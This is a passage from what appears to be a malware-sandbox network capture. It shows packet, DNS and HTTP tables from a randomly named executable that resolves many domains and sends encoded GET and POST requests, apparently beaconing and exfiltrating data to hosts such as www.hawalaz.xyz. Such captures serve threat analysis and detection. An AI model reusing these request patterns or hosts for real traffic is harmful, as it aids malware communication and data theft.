                  Jul 3, 2024 10:53:22.958832026 CEST8049746121.37.199.72192.168.2.11
                  Jul 3, 2024 10:53:22.958956957 CEST8049746121.37.199.72192.168.2.11
                  Jul 3, 2024 10:53:22.958971024 CEST8049746121.37.199.72192.168.2.11
                  Jul 3, 2024 10:53:22.959000111 CEST4974680192.168.2.11121.37.199.72
                  Jul 3, 2024 10:53:22.959041119 CEST4974680192.168.2.11121.37.199.72
                  Jul 3, 2024 10:53:23.479866982 CEST4974680192.168.2.11121.37.199.72
                  Jul 3, 2024 10:53:24.507283926 CEST4974780192.168.2.11121.37.199.72
                  Jul 3, 2024 10:53:24.512361050 CEST8049747121.37.199.72192.168.2.11
                  Jul 3, 2024 10:53:24.512435913 CEST4974780192.168.2.11121.37.199.72
                  Jul 3, 2024 10:53:24.514997005 CEST4974780192.168.2.11121.37.199.72
                  Jul 3, 2024 10:53:24.519896984 CEST8049747121.37.199.72192.168.2.11
                  Jul 3, 2024 10:53:25.491576910 CEST8049747121.37.199.72192.168.2.11
                  Jul 3, 2024 10:53:25.491609097 CEST8049747121.37.199.72192.168.2.11
                  Jul 3, 2024 10:53:25.491621017 CEST8049747121.37.199.72192.168.2.11
                  Jul 3, 2024 10:53:25.491734028 CEST4974780192.168.2.11121.37.199.72
                  Jul 3, 2024 10:53:25.491889000 CEST8049747121.37.199.72192.168.2.11
                  Jul 3, 2024 10:53:25.491902113 CEST8049747121.37.199.72192.168.2.11
                  Jul 3, 2024 10:53:25.495018959 CEST4974780192.168.2.11121.37.199.72
                  Jul 3, 2024 10:53:25.498542070 CEST4974780192.168.2.11121.37.199.72
                  Jul 3, 2024 10:53:25.503472090 CEST8049747121.37.199.72192.168.2.11
                  Jul 3, 2024 10:53:31.646596909 CEST4974880192.168.2.113.33.244.179
                  Jul 3, 2024 10:53:31.651503086 CEST80497483.33.244.179192.168.2.11
                  Jul 3, 2024 10:53:31.654659986 CEST4974880192.168.2.113.33.244.179
                  Jul 3, 2024 10:53:31.658545971 CEST4974880192.168.2.113.33.244.179
                  Jul 3, 2024 10:53:31.665071011 CEST80497483.33.244.179192.168.2.11
                  Jul 3, 2024 10:53:32.118783951 CEST80497483.33.244.179192.168.2.11
                  Jul 3, 2024 10:53:32.118846893 CEST4974880192.168.2.113.33.244.179
                  Jul 3, 2024 10:53:33.170572996 CEST4974880192.168.2.113.33.244.179
                  Jul 3, 2024 10:53:33.243905067 CEST80497483.33.244.179192.168.2.11
                  Jul 3, 2024 10:53:34.187398911 CEST4974980192.168.2.113.33.244.179
                  Jul 3, 2024 10:53:34.192424059 CEST80497493.33.244.179192.168.2.11
                  Jul 3, 2024 10:53:34.192501068 CEST4974980192.168.2.113.33.244.179
                  Jul 3, 2024 10:53:34.194782019 CEST4974980192.168.2.113.33.244.179
                  Jul 3, 2024 10:53:34.199702978 CEST80497493.33.244.179192.168.2.11
                  Jul 3, 2024 10:53:34.670005083 CEST80497493.33.244.179192.168.2.11
                  Jul 3, 2024 10:53:34.670054913 CEST4974980192.168.2.113.33.244.179
                  Jul 3, 2024 10:53:35.700603008 CEST4974980192.168.2.113.33.244.179
                  Jul 3, 2024 10:53:35.705538988 CEST80497493.33.244.179192.168.2.11
                  Jul 3, 2024 10:53:36.732845068 CEST4975080192.168.2.113.33.244.179
                  Jul 3, 2024 10:53:36.737859011 CEST80497503.33.244.179192.168.2.11
                  Jul 3, 2024 10:53:36.737934113 CEST4975080192.168.2.113.33.244.179
                  Jul 3, 2024 10:53:36.740550995 CEST4975080192.168.2.113.33.244.179
                  Jul 3, 2024 10:53:36.745517015 CEST80497503.33.244.179192.168.2.11
                  Jul 3, 2024 10:53:36.745568991 CEST80497503.33.244.179192.168.2.11
                  Jul 3, 2024 10:53:37.213330984 CEST80497503.33.244.179192.168.2.11
                  Jul 3, 2024 10:53:37.216869116 CEST4975080192.168.2.113.33.244.179
                  Jul 3, 2024 10:53:38.246234894 CEST4975080192.168.2.113.33.244.179
                  Jul 3, 2024 10:53:38.251174927 CEST80497503.33.244.179192.168.2.11
                  Jul 3, 2024 10:53:39.264786959 CEST4975180192.168.2.113.33.244.179
                  Jul 3, 2024 10:53:39.269756079 CEST80497513.33.244.179192.168.2.11
                  Jul 3, 2024 10:53:39.274671078 CEST4975180192.168.2.113.33.244.179
                  Jul 3, 2024 10:53:39.277683973 CEST4975180192.168.2.113.33.244.179
                  Jul 3, 2024 10:53:39.282520056 CEST80497513.33.244.179192.168.2.11
                  Jul 3, 2024 10:53:39.740819931 CEST80497513.33.244.179192.168.2.11
                  Jul 3, 2024 10:53:39.740843058 CEST80497513.33.244.179192.168.2.11
                  Jul 3, 2024 10:53:39.741913080 CEST4975180192.168.2.113.33.244.179
                  Jul 3, 2024 10:53:39.746608019 CEST4975180192.168.2.113.33.244.179
                  Jul 3, 2024 10:53:39.751569033 CEST80497513.33.244.179192.168.2.11
                  Jul 3, 2024 10:53:44.765805006 CEST4975280192.168.2.11104.21.21.230
                  Jul 3, 2024 10:53:44.770803928 CEST8049752104.21.21.230192.168.2.11
                  Jul 3, 2024 10:53:44.770915985 CEST4975280192.168.2.11104.21.21.230
                  Jul 3, 2024 10:53:44.773061037 CEST4975280192.168.2.11104.21.21.230
                  Jul 3, 2024 10:53:44.777877092 CEST8049752104.21.21.230192.168.2.11
                  Jul 3, 2024 10:53:45.389847994 CEST8049752104.21.21.230192.168.2.11
                  Jul 3, 2024 10:53:45.390686035 CEST8049752104.21.21.230192.168.2.11
                  Jul 3, 2024 10:53:45.390804052 CEST4975280192.168.2.11104.21.21.230
                  Jul 3, 2024 10:53:46.276711941 CEST4975280192.168.2.11104.21.21.230
                  Jul 3, 2024 10:53:47.296660900 CEST4975380192.168.2.11104.21.21.230
                  Jul 3, 2024 10:53:47.302433014 CEST8049753104.21.21.230192.168.2.11
                  Jul 3, 2024 10:53:47.306629896 CEST4975380192.168.2.11104.21.21.230
                  Jul 3, 2024 10:53:47.306629896 CEST4975380192.168.2.11104.21.21.230
                  Jul 3, 2024 10:53:47.311580896 CEST8049753104.21.21.230192.168.2.11
                  Jul 3, 2024 10:53:48.018042088 CEST8049753104.21.21.230192.168.2.11
                  Jul 3, 2024 10:53:48.018349886 CEST8049753104.21.21.230192.168.2.11
                  Jul 3, 2024 10:53:48.022569895 CEST4975380192.168.2.11104.21.21.230
                  Jul 3, 2024 10:53:48.807918072 CEST4975380192.168.2.11104.21.21.230
                  Jul 3, 2024 10:53:49.826879978 CEST4975480192.168.2.11104.21.21.230
                  Jul 3, 2024 10:53:49.831861019 CEST8049754104.21.21.230192.168.2.11
                  Jul 3, 2024 10:53:49.834757090 CEST4975480192.168.2.11104.21.21.230
                  Jul 3, 2024 10:53:49.838572979 CEST4975480192.168.2.11104.21.21.230
                  Jul 3, 2024 10:53:49.843430996 CEST8049754104.21.21.230192.168.2.11
                  Jul 3, 2024 10:53:49.843485117 CEST8049754104.21.21.230192.168.2.11
                  Jul 3, 2024 10:53:50.463789940 CEST8049754104.21.21.230192.168.2.11
                  Jul 3, 2024 10:53:50.465200901 CEST8049754104.21.21.230192.168.2.11
                  Jul 3, 2024 10:53:50.465264082 CEST4975480192.168.2.11104.21.21.230
                  Jul 3, 2024 10:53:51.341372967 CEST4975480192.168.2.11104.21.21.230
                  Jul 3, 2024 10:53:52.358313084 CEST4975580192.168.2.11104.21.21.230
                  Jul 3, 2024 10:53:52.363301992 CEST8049755104.21.21.230192.168.2.11
                  Jul 3, 2024 10:53:52.363423109 CEST4975580192.168.2.11104.21.21.230
                  Jul 3, 2024 10:53:52.365255117 CEST4975580192.168.2.11104.21.21.230
                  Jul 3, 2024 10:53:52.370065928 CEST8049755104.21.21.230192.168.2.11
                  Jul 3, 2024 10:53:53.031018019 CEST8049755104.21.21.230192.168.2.11
                  Jul 3, 2024 10:53:53.031183004 CEST8049755104.21.21.230192.168.2.11
                  Jul 3, 2024 10:53:53.031243086 CEST4975580192.168.2.11104.21.21.230
                  Jul 3, 2024 10:53:53.033781052 CEST4975580192.168.2.11104.21.21.230
                  Jul 3, 2024 10:53:53.039808989 CEST8049755104.21.21.230192.168.2.11
                  Jul 3, 2024 10:53:58.064570904 CEST4975680192.168.2.1174.208.46.171
                  Jul 3, 2024 10:53:58.069484949 CEST804975674.208.46.171192.168.2.11
                  Jul 3, 2024 10:53:58.069611073 CEST4975680192.168.2.1174.208.46.171
                  Jul 3, 2024 10:53:58.072606087 CEST4975680192.168.2.1174.208.46.171
                  Jul 3, 2024 10:53:58.077599049 CEST804975674.208.46.171192.168.2.11
                  Jul 3, 2024 10:53:58.601106882 CEST804975674.208.46.171192.168.2.11
                  Jul 3, 2024 10:53:58.601167917 CEST804975674.208.46.171192.168.2.11
                  Jul 3, 2024 10:53:58.601224899 CEST4975680192.168.2.1174.208.46.171
                  Jul 3, 2024 10:53:59.573978901 CEST4975680192.168.2.1174.208.46.171
                  Jul 3, 2024 10:54:00.592170954 CEST4975780192.168.2.1174.208.46.171
                  Jul 3, 2024 10:54:00.598737955 CEST804975774.208.46.171192.168.2.11
                  Jul 3, 2024 10:54:00.598880053 CEST4975780192.168.2.1174.208.46.171
                  Jul 3, 2024 10:54:00.600840092 CEST4975780192.168.2.1174.208.46.171
                  Jul 3, 2024 10:54:00.606060982 CEST804975774.208.46.171192.168.2.11
                  Jul 3, 2024 10:54:01.120146990 CEST804975774.208.46.171192.168.2.11
                  Jul 3, 2024 10:54:01.120174885 CEST804975774.208.46.171192.168.2.11
                  Jul 3, 2024 10:54:01.120371103 CEST4975780192.168.2.1174.208.46.171
                  Jul 3, 2024 10:54:02.104960918 CEST4975780192.168.2.1174.208.46.171
                  Jul 3, 2024 10:54:03.124452114 CEST4975880192.168.2.1174.208.46.171
                  Jul 3, 2024 10:54:03.131239891 CEST804975874.208.46.171192.168.2.11
                  Jul 3, 2024 10:54:03.131320953 CEST4975880192.168.2.1174.208.46.171
                  Jul 3, 2024 10:54:03.133364916 CEST4975880192.168.2.1174.208.46.171
                  Jul 3, 2024 10:54:03.138530970 CEST804975874.208.46.171192.168.2.11
                  Jul 3, 2024 10:54:03.139755964 CEST804975874.208.46.171192.168.2.11
                  Jul 3, 2024 10:54:03.750207901 CEST804975874.208.46.171192.168.2.11
                  Jul 3, 2024 10:54:03.750597000 CEST804975874.208.46.171192.168.2.11
                  Jul 3, 2024 10:54:03.754776955 CEST4975880192.168.2.1174.208.46.171
                  Jul 3, 2024 10:54:04.636045933 CEST4975880192.168.2.1174.208.46.171
                  Jul 3, 2024 10:54:05.656163931 CEST4975980192.168.2.1174.208.46.171
                  Jul 3, 2024 10:54:05.661127090 CEST804975974.208.46.171192.168.2.11
                  Jul 3, 2024 10:54:05.662755966 CEST4975980192.168.2.1174.208.46.171
                  Jul 3, 2024 10:54:05.666165113 CEST4975980192.168.2.1174.208.46.171
                  Jul 3, 2024 10:54:05.671036005 CEST804975974.208.46.171192.168.2.11
                  Jul 3, 2024 10:54:06.286864996 CEST804975974.208.46.171192.168.2.11
                  Jul 3, 2024 10:54:06.288466930 CEST804975974.208.46.171192.168.2.11
                  Jul 3, 2024 10:54:06.288526058 CEST4975980192.168.2.1174.208.46.171
                  Jul 3, 2024 10:54:06.291235924 CEST4975980192.168.2.1174.208.46.171
                  Jul 3, 2024 10:54:06.297517061 CEST804975974.208.46.171192.168.2.11
                  Jul 3, 2024 10:54:14.423882008 CEST4976080192.168.2.11118.99.50.8
                  Jul 3, 2024 10:54:14.428963900 CEST8049760118.99.50.8192.168.2.11
                  Jul 3, 2024 10:54:14.429081917 CEST4976080192.168.2.11118.99.50.8
                  Jul 3, 2024 10:54:14.433928967 CEST4976080192.168.2.11118.99.50.8
                  Jul 3, 2024 10:54:14.439059019 CEST8049760118.99.50.8192.168.2.11
                  Jul 3, 2024 10:54:15.362982035 CEST8049760118.99.50.8192.168.2.11
                  Jul 3, 2024 10:54:15.363149881 CEST8049760118.99.50.8192.168.2.11
                  Jul 3, 2024 10:54:15.363574028 CEST4976080192.168.2.11118.99.50.8
                  Jul 3, 2024 10:54:15.368813992 CEST4976080192.168.2.11118.99.50.8
                  Jul 3, 2024 10:54:15.373716116 CEST8049760118.99.50.8192.168.2.11
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jul 3, 2024 10:50:50.465136051 CEST | 49929 | 53 | 192.168.2.11 | 1.1.1.1
Jul 3, 2024 10:50:51.083813906 CEST | 53 | 49929 | 1.1.1.1 | 192.168.2.11
Jul 3, 2024 10:51:07.125380039 CEST | 65161 | 53 | 192.168.2.11 | 1.1.1.1
Jul 3, 2024 10:51:07.136548042 CEST | 53 | 65161 | 1.1.1.1 | 192.168.2.11
Jul 3, 2024 10:51:15.202462912 CEST | 53005 | 53 | 192.168.2.11 | 1.1.1.1
Jul 3, 2024 10:51:15.233519077 CEST | 53 | 53005 | 1.1.1.1 | 192.168.2.11
Jul 3, 2024 10:51:33.874119997 CEST | 51415 | 53 | 192.168.2.11 | 1.1.1.1
Jul 3, 2024 10:51:34.215791941 CEST | 53 | 51415 | 1.1.1.1 | 192.168.2.11
Jul 3, 2024 10:51:42.280157089 CEST | 63745 | 53 | 192.168.2.11 | 1.1.1.1
Jul 3, 2024 10:51:42.290940046 CEST | 53 | 63745 | 1.1.1.1 | 192.168.2.11
Jul 3, 2024 10:51:50.358809948 CEST | 53847 | 53 | 192.168.2.11 | 1.1.1.1
Jul 3, 2024 10:51:50.843497992 CEST | 53 | 53847 | 1.1.1.1 | 192.168.2.11
Jul 3, 2024 10:52:03.968764067 CEST | 54516 | 53 | 192.168.2.11 | 1.1.1.1
Jul 3, 2024 10:52:04.417825937 CEST | 53 | 54516 | 1.1.1.1 | 192.168.2.11
Jul 3, 2024 10:52:17.906510115 CEST | 58552 | 53 | 192.168.2.11 | 1.1.1.1
Jul 3, 2024 10:52:17.919965029 CEST | 53 | 58552 | 1.1.1.1 | 192.168.2.11
Jul 3, 2024 10:52:25.992536068 CEST | 63585 | 53 | 192.168.2.11 | 1.1.1.1
Jul 3, 2024 10:52:26.007946968 CEST | 53 | 63585 | 1.1.1.1 | 192.168.2.11
Jul 3, 2024 10:52:39.142529011 CEST | 53554 | 53 | 192.168.2.11 | 1.1.1.1
Jul 3, 2024 10:52:40.151921988 CEST | 53554 | 53 | 192.168.2.11 | 1.1.1.1
Jul 3, 2024 10:52:40.193031073 CEST | 53 | 53554 | 1.1.1.1 | 192.168.2.11
Jul 3, 2024 10:52:40.193044901 CEST | 53 | 53554 | 1.1.1.1 | 192.168.2.11
Jul 3, 2024 10:52:43.231481075 CEST | 59135 | 53 | 192.168.2.11 | 1.1.1.1
Jul 3, 2024 10:52:43.242959023 CEST | 53 | 59135 | 1.1.1.1 | 192.168.2.11
Jul 3, 2024 10:52:48.249289989 CEST | 59385 | 53 | 192.168.2.11 | 1.1.1.1
Jul 3, 2024 10:52:48.355214119 CEST | 53 | 59385 | 1.1.1.1 | 192.168.2.11
Jul 3, 2024 10:53:02.311994076 CEST | 50922 | 53 | 192.168.2.11 | 1.1.1.1
Jul 3, 2024 10:53:02.542828083 CEST | 53 | 50922 | 1.1.1.1 | 192.168.2.11
Jul 3, 2024 10:53:16.032546043 CEST | 59800 | 53 | 192.168.2.11 | 1.1.1.1
Jul 3, 2024 10:53:16.896552086 CEST | 53 | 59800 | 1.1.1.1 | 192.168.2.11
Jul 3, 2024 10:53:30.515921116 CEST | 56514 | 53 | 192.168.2.11 | 1.1.1.1
Jul 3, 2024 10:53:31.513060093 CEST | 56514 | 53 | 192.168.2.11 | 1.1.1.1
Jul 3, 2024 10:53:31.642873049 CEST | 53 | 56514 | 1.1.1.1 | 192.168.2.11
Jul 3, 2024 10:53:31.642889977 CEST | 53 | 56514 | 1.1.1.1 | 192.168.2.11
Jul 3, 2024 10:53:44.749187946 CEST | 60113 | 53 | 192.168.2.11 | 1.1.1.1
Jul 3, 2024 10:53:44.763266087 CEST | 53 | 60113 | 1.1.1.1 | 192.168.2.11
Jul 3, 2024 10:53:58.046428919 CEST | 50162 | 53 | 192.168.2.11 | 1.1.1.1
Jul 3, 2024 10:53:58.061124086 CEST | 53 | 50162 | 1.1.1.1 | 192.168.2.11
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jul 3, 2024 10:50:50.465136051 CEST | 192.168.2.11 | 1.1.1.1 | 0xb8a7 | Standard query (0) | www.zt555.shop | A (IP address) | IN (0x0001) | false
Jul 3, 2024 10:51:07.125380039 CEST | 192.168.2.11 | 1.1.1.1 | 0xfc3d | Standard query (0) | www.pista789.win | A (IP address) | IN (0x0001) | false
Jul 3, 2024 10:51:15.202462912 CEST | 192.168.2.11 | 1.1.1.1 | 0x249c | Standard query (0) | www.hawalaz.xyz | A (IP address) | IN (0x0001) | false
Jul 3, 2024 10:51:33.874119997 CEST | 192.168.2.11 | 1.1.1.1 | 0x7b8 | Standard query (0) | www.dribbean.website | A (IP address) | IN (0x0001) | false
Jul 3, 2024 10:51:42.280157089 CEST | 192.168.2.11 | 1.1.1.1 | 0xb157 | Standard query (0) | www.gzlhysuess.com | A (IP address) | IN (0x0001) | false
Jul 3, 2024 10:51:50.358809948 CEST | 192.168.2.11 | 1.1.1.1 | 0x217a | Standard query (0) | www.66hc7.com | A (IP address) | IN (0x0001) | false
Jul 3, 2024 10:52:03.968764067 CEST | 192.168.2.11 | 1.1.1.1 | 0x47df | Standard query (0) | www.zl1l5r.website | A (IP address) | IN (0x0001) | false
Jul 3, 2024 10:52:17.906510115 CEST | 192.168.2.11 | 1.1.1.1 | 0x3d | Standard query (0) | www.xn--vct91ch7lruy.com | A (IP address) | IN (0x0001) | false
Jul 3, 2024 10:52:25.992536068 CEST | 192.168.2.11 | 1.1.1.1 | 0x886f | Standard query (0) | www.marismotivates.com | A (IP address) | IN (0x0001) | false
Jul 3, 2024 10:52:39.142529011 CEST | 192.168.2.11 | 1.1.1.1 | 0x1c7d | Standard query (0) | www.warcorpshs.com | A (IP address) | IN (0x0001) | false
Jul 3, 2024 10:52:40.151921988 CEST | 192.168.2.11 | 1.1.1.1 | 0x1c7d | Standard query (0) | www.warcorpshs.com | A (IP address) | IN (0x0001) | false
Jul 3, 2024 10:52:43.231481075 CEST | 192.168.2.11 | 1.1.1.1 | 0xba40 | Standard query (0) | www.warcorpshs.com | A (IP address) | IN (0x0001) | false
Jul 3, 2024 10:52:48.249289989 CEST | 192.168.2.11 | 1.1.1.1 | 0xe4ef | Standard query (0) | www.lecoinsa.net | A (IP address) | IN (0x0001) | false
Jul 3, 2024 10:53:02.311994076 CEST | 192.168.2.11 | 1.1.1.1 | 0xe40b | Standard query (0) | www.778981.com | A (IP address) | IN (0x0001) | false
Jul 3, 2024 10:53:16.032546043 CEST | 192.168.2.11 | 1.1.1.1 | 0x4b51 | Standard query (0) | www.yetung.com | A (IP address) | IN (0x0001) | false
Jul 3, 2024 10:53:30.515921116 CEST | 192.168.2.11 | 1.1.1.1 | 0x5346 | Standard query (0) | www.oliviacorepilates.com | A (IP address) | IN (0x0001) | false
Jul 3, 2024 10:53:31.513060093 CEST | 192.168.2.11 | 1.1.1.1 | 0x5346 | Standard query (0) | www.oliviacorepilates.com | A (IP address) | IN (0x0001) | false
Jul 3, 2024 10:53:44.749187946 CEST | 192.168.2.11 | 1.1.1.1 | 0x4a54 | Standard query (0) | www.personalcaresale.shop | A (IP address) | IN (0x0001) | false
Jul 3, 2024 10:53:58.046428919 CEST | 192.168.2.11 | 1.1.1.1 | 0x7535 | Standard query (0) | www.lavillitadepapa.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jul 3, 2024 10:50:51.083813906 CEST | 1.1.1.1 | 192.168.2.11 | 0xb8a7 | No error (0) | www.zt555.shop |  | 118.99.50.8 | A (IP address) | IN (0x0001) | false
Jul 3, 2024 10:51:07.136548042 CEST | 1.1.1.1 | 192.168.2.11 | 0xfc3d | Name error (3) | www.pista789.win | none | none | A (IP address) | IN (0x0001) | false
Jul 3, 2024 10:51:15.233519077 CEST | 1.1.1.1 | 192.168.2.11 | 0x249c | No error (0) | www.hawalaz.xyz |  | 162.0.213.72 | A (IP address) | IN (0x0001) | false
Jul 3, 2024 10:51:34.215791941 CEST | 1.1.1.1 | 192.168.2.11 | 0x7b8 | Name error (3) | www.dribbean.website | none | none | A (IP address) | IN (0x0001) | false
Jul 3, 2024 10:51:42.290940046 CEST | 1.1.1.1 | 192.168.2.11 | 0xb157 | Name error (3) | www.gzlhysuess.com | none | none | A (IP address) | IN (0x0001) | false
Jul 3, 2024 10:51:50.843497992 CEST | 1.1.1.1 | 192.168.2.11 | 0x217a | No error (0) | www.66hc7.com | kloeti.pc205kopl.com |  | CNAME (Canonical name) | IN (0x0001) | false
Jul 3, 2024 10:51:50.843497992 CEST | 1.1.1.1 | 192.168.2.11 | 0x217a | No error (0) | kloeti.pc205kopl.com |  | 162.209.189.210 | A (IP address) | IN (0x0001) | false
Jul 3, 2024 10:51:50.843497992 CEST | 1.1.1.1 | 192.168.2.11 | 0x217a | No error (0) | kloeti.pc205kopl.com |  | 162.209.189.211 | A (IP address) | IN (0x0001) | false
Jul 3, 2024 10:51:50.843497992 CEST | 1.1.1.1 | 192.168.2.11 | 0x217a | No error (0) | kloeti.pc205kopl.com |  | 162.209.189.212 | A (IP address) | IN (0x0001) | false
Jul 3, 2024 10:52:04.417825937 CEST | 1.1.1.1 | 192.168.2.11 | 0x47df | No error (0) | www.zl1l5r.website |  | 198.16.50.172 | A (IP address) | IN (0x0001) | false
Jul 3, 2024 10:52:17.919965029 CEST | 1.1.1.1 | 192.168.2.11 | 0x3d | Name error (3) | www.xn--vct91ch7lruy.com | none | none | A (IP address) | IN (0x0001) | false
Jul 3, 2024 10:52:26.007946968 CEST | 1.1.1.1 | 192.168.2.11 | 0x886f | No error (0) | www.marismotivates.com | marismotivates.com |  | CNAME (Canonical name) | IN (0x0001) | false
Jul 3, 2024 10:52:26.007946968 CEST | 1.1.1.1 | 192.168.2.11 | 0x886f | No error (0) | marismotivates.com |  | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Jul 3, 2024 10:52:26.007946968 CEST | 1.1.1.1 | 192.168.2.11 | 0x886f | No error (0) | marismotivates.com |  | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Jul 3, 2024 10:52:40.193031073 CEST | 1.1.1.1 | 192.168.2.11 | 0x1c7d | Name error (3) | www.warcorpshs.com | none | none | A (IP address) | IN (0x0001) | false
Jul 3, 2024 10:52:40.193044901 CEST | 1.1.1.1 | 192.168.2.11 | 0x1c7d | Name error (3) | www.warcorpshs.com | none | none | A (IP address) | IN (0x0001) | false
Jul 3, 2024 10:52:43.242959023 CEST | 1.1.1.1 | 192.168.2.11 | 0xba40 | Name error (3) | www.warcorpshs.com | none | none | A (IP address) | IN (0x0001) | false
Jul 3, 2024 10:52:48.355214119 CEST | 1.1.1.1 | 192.168.2.11 | 0xe4ef | No error (0) | www.lecoinsa.net |  | 217.116.0.191 | A (IP address) | IN (0x0001) | false
Jul 3, 2024 10:53:02.542828083 CEST | 1.1.1.1 | 192.168.2.11 | 0xe40b | No error (0) | www.778981.com | xjc-g1171-6-g-1584411309302y.onlinename11txcnddns.com |  | CNAME (Canonical name) | IN (0x0001) | false
Jul 3, 2024 10:53:02.542828083 CEST | 1.1.1.1 | 192.168.2.11 | 0xe40b | No error (0) | xjc-g1171-6-g-1584411309302y.onlinename11txcnddns.com | g1171-6-g-1584411309302y.greycdn.net |  | CNAME (Canonical name) | IN (0x0001) | false
Jul 3, 2024 10:53:02.542828083 CEST | 1.1.1.1 | 192.168.2.11 | 0xe40b | No error (0) | g1171-6-g-1584411309302y.greycdn.net | c96e98f1fy.greycdn.net |  | CNAME (Canonical name) | IN (0x0001) | false
Jul 3, 2024 10:53:02.542828083 CEST | 1.1.1.1 | 192.168.2.11 | 0xe40b | No error (0) | c96e98f1fy.greycdn.net | 7a4ca695fd164z.greycdn.net |  | CNAME (Canonical name) | IN (0x0001) | false
Jul 3, 2024 10:53:02.542828083 CEST | 1.1.1.1 | 192.168.2.11 | 0xe40b | No error (0) | 7a4ca695fd164z.greycdn.net |  | 165.154.0.120 | A (IP address) | IN (0x0001) | false
Jul 3, 2024 10:53:16.896552086 CEST | 1.1.1.1 | 192.168.2.11 | 0x4b51 | No error (0) | www.yetung.com | yetung.com.lho0.faipod.com |  | CNAME (Canonical name) | IN (0x0001) | false
Jul 3, 2024 10:53:16.896552086 CEST | 1.1.1.1 | 192.168.2.11 | 0x4b51 | No error (0) | yetung.com.lho0.faipod.com |  | 121.37.199.72 | A (IP address) | IN (0x0001) | false
Jul 3, 2024 10:53:31.642873049 CEST | 1.1.1.1 | 192.168.2.11 | 0x5346 | No error (0) | www.oliviacorepilates.com |  | 3.33.244.179 | A (IP address) | IN (0x0001) | false
Jul 3, 2024 10:53:31.642889977 CEST | 1.1.1.1 | 192.168.2.11 | 0x5346 | No error (0) | www.oliviacorepilates.com |  | 3.33.244.179 | A (IP address) | IN (0x0001) | false
Jul 3, 2024 10:53:44.763266087 CEST | 1.1.1.1 | 192.168.2.11 | 0x4a54 | No error (0) | www.personalcaresale.shop |  | 104.21.21.230 | A (IP address) | IN (0x0001) | false
Jul 3, 2024 10:53:44.763266087 CEST | 1.1.1.1 | 192.168.2.11 | 0x4a54 | No error (0) | www.personalcaresale.shop |  | 172.67.200.242 | A (IP address) | IN (0x0001) | false
Jul 3, 2024 10:53:58.061124086 CEST | 1.1.1.1 | 192.168.2.11 | 0x7535 | No error (0) | www.lavillitadepapa.com |  | 74.208.46.171 | A (IP address) | IN (0x0001) | false
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.11 | 49718 | 118.99.50.88 | 80 | 1164 | C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe
Timestamp | Bytes transferred | Direction | Data
Jul 3, 2024 10:50:51.101381063 CEST | 409 | OUT | GET /l25n/?Qb94=7vWTifjxU&ylT8el=auppmJM7eN7J/jcd3Cnnc7lcHiLNgr09bdvJbM3sU1/Dmtxph+2FzvX7ZDnD2EcIcX9RCCjXq1LDmMY1SoU+nq8rcMPpo2Cr+tMuRnJbKxq7CEWaX/NqKVE= HTTP/1.1
                  Host: www.zt555.shop
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Language: en-US,en;q=0.9
                  Connection: close
                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
Jul 3, 2024 10:50:51.965064049 CEST | 289 | IN | HTTP/1.1 404 Not Found
                  Server: nginx
                  Date: Wed, 03 Jul 2024 08:50:51 GMT
                  Content-Type: text/html
                  Content-Length: 146
                  Connection: close
                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.11 | 49720 | 162.0.213.72 | 80 | 1164 | C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe
Timestamp | Bytes transferred | Direction | Data
Jul 3, 2024 10:51:15.243486881 CEST | 669 | OUT | POST /f0fa/ HTTP/1.1
                  Host: www.hawalaz.xyz
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Encoding: gzip, deflate
                  Accept-Language: en-US,en;q=0.9
                  Origin: http://www.hawalaz.xyz
                  Content-Length: 203
                  Cache-Control: no-cache
                  Connection: close
                  Content-Type: application/x-www-form-urlencoded
                  Referer: http://www.hawalaz.xyz/f0fa/
                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                  Data Ascii: ylT8el=8GvF4IHDkxfRSB0rZImM9Q10szByHt37o5hNM6FlMJHoGIoBXzkgmnPuYie/hb93cvTTHBr0n6dfOWvXLPipzt6UIbkta/ReMU4TnudrqAbEzYFfkuWJcb+fTVfcVwPECiSYWNQIL6g6Ou02dAKkH8ex7l3sKU+gcTWc60rfswxIvvmc6y+zPhaRNG2cb/jUKg==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.11 | 49721 | 162.0.213.72 | 80 | 1164 | C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe
Timestamp | Bytes transferred | Direction | Data
Jul 3, 2024 10:51:17.776242971 CEST | 689 | OUT | POST /f0fa/ HTTP/1.1
                  Host: www.hawalaz.xyz
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Encoding: gzip, deflate
                  Accept-Language: en-US,en;q=0.9
                  Origin: http://www.hawalaz.xyz
                  Content-Length: 223
                  Cache-Control: no-cache
                  Connection: close
                  Content-Type: application/x-www-form-urlencoded
                  Referer: http://www.hawalaz.xyz/f0fa/
                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
